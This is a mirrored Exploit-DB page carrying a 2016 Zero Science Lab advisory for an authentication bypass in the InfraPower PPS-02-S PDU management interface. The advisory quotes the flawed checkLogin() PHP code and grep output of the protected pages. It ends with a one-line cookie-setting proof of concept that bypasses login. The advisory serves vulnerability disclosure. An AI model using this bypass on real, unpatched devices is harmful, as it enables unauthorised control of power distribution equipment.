bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40645.txt
Offensive Security 3b565e4e9d DB: 2016-10-29 
7 new exploits

SetCMS 3.6.5 - (setcms.org) Remote Command Execution
SetCMS 3.6.5 - Remote Command Execution
PHP-Nuke < 8.0 - 'sid' SQL Injection
PHP-Nuke 8.0 Final - 'sid' SQL Injection
PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection
PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection

Foojan Wms 1.0 - (index.php story) SQL Injection
Foojan Wms 1.0 - 'story' Parameter SQL Injection

Web Wiz Forums 9.07 - (sub) Directory Traversal
Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal
Web Wiz NewsPad 1.02 - (sub) Directory Traversal
Siteman 1.1.9 - (cat) Remote File Disclosure
Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution
SLAED CMS 2.5 Lite - (newlang) Local File Inclusion
Liquid-Silver CMS 0.1 - (update) Local File Inclusion
Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal
Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure
Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution
SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion
Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion
Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure
ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)
Seagull 0.6.3 - 'files' Parameter Remote File Disclosure
ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)

flinx 1.3 - (category.php id) SQL Injection
flinx 1.3 - 'id' Parameter SQL Injection

Persits XUpload 3.0 - AddFile() Remote Buffer Overflow
Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow

simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Simple Forum 3.2 - File Disclosure / Cross-Site Scripting
WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection
WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection
Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)
Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)
WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection
WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection
Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash)
Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)
phpMyClub 0.0.1 - (page_courante) Local File Inclusion
bubbling library 1.32 - dispatcher.php Remote File Disclosure
Bigware Shop 2.0 - pollid SQL Injection
Smart Publisher 1.0.1 - (disp.php) Remote Code Execution
SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit
phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion
bubbling library 1.32 - 'uri' Parameter Remote File Disclosure
Bigware Shop 2.0 - 'pollid' Parameter SQL Injection
Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution
SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit
phpCMS 1.2.2 - (parser.php) Remote File Disclosure
Mambo Component NewsLetter - (listid) SQL Injection
Mambo Component Fq - (listid) SQL Injection
Mambo Component MaMML - (listid) SQL Injection
phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure
Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection
Mambo 'com_fq' - 'listid' Parameter SQL Injection
Mambo 'com_mamml' - 'listid' Parameter SQL Injection
phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - 'counter.php' Remote File Inclusion
phpCMS 1.1.7 - 'parser.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion

phpCMS 2008 - 'ask/search_ajax.php' SQL Injection
phpCMS 2008 - 'search_ajax.php' SQL Injection
InfraPower PPS-02-S Q213V1 - Local File Disclosure
InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference
InfraPower PPS-02-S Q213V1 - Authentication Bypass
InfraPower PPS-02-S Q213V1 - Multiple XSS
InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery
InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials
InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution
2016-10-29 05:01:21 +00:00

142 lines
7.8 KiB
Text
Executable file
Raw Blame History

InfraPower PPS-02-S Q213V1 Authentication Bypass Vulnerability
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: The device does not properly perform authentication, allowing
it to be bypassed through cookie manipulation. The vulnerable function
checkLogin() in 'Function.php' checks only if the 'Login' Cookie is empty
or not, allowing easy bypass of the user security mechanisms.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5374
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5374.php
27.09.2016
--
(example) System.php:
---------------------
1: <?php
2:
3: require_once("Function.php");
4: session_start();
5: if(!checkLogin())
6: header('Location: Login.php');
7:
---------------------------------------
Function.php:
-------------
155: function checkLogin(){
156: if(empty($_SESSION['Login']))
157: return false;
158: return true;
159: }
160:
--------------------
'Sessioned' scripts:
➜ www grep -rHn 'session_start' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Login.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:9: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/System.php:4: session_start();
/Users/liwomac/Desktop/infrapower_files/www/User.php:3: session_start();
➜ www grep -rHn 'session_destroy' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:256: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Function.php:266: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:7: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:53: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:63: session_destroy();
➜ www grep -rHn '$_SESSION' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:11: if(isset($_SESSION['ite'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:12: $this->init($_SESSION['ite']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:156: if(empty($_SESSION['Login']))
/Users/liwomac/Desktop/infrapower_files/www/Function.php:233: if(!isset($_SESSION['TimeSync'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:234: $_SESSION['TimeSync'] = getConf("/mnt/mtd/main_conf", "TimeSyncPDU_opt");
/Users/liwomac/Desktop/infrapower_files/www/Function.php:235: if($_SESSION['TimeSync'] == "ON"){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:237: $_SESSION['SyncDate'] = explode(":",$SyncDate);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:239: $_SESSION['TimeSync'] = "OFF";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:240: $_SESSION['SyncDate'][0] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:241: $_SESSION['SyncDate'][1] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:255: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:265: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Login.php:31: $_SESSION['ite'] = substr($this->InfraType,1,1); // e.g."t3v3" get the second chr 3;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:64: $_SESSION['ite'] = "1";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:67: $_SESSION['ite'] = "2";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:70: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:73: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:76: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:79: $_SESSION['ite'] = "4";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:82: $_SESSION['ite'] = FALSE;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:91:$_SESSION['ite'] = $InfraType;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:137: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:140: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:156: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Login.php:167: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:3: $_SESSION['Login'];
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:4: if (isset($_SESSION['Login'])){
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:5: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Menu.php:60: /*if ($_SESSION["SS_SystemCreated"] == "1") {
/Users/liwomac/Desktop/infrapower_files/www/System.php:52: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/System.php:62: unset($_SESSION['Login']);
➜ www grep -rHn 'checkLogin' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Function.php:155: function checkLogin(){
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Login.php:165: if(checkLogin()) {
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:10: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/System.php:5: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/User.php:4: if(!checkLogin())
PoC:
javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT"
--
Reference in a new issue View git blame Copy permalink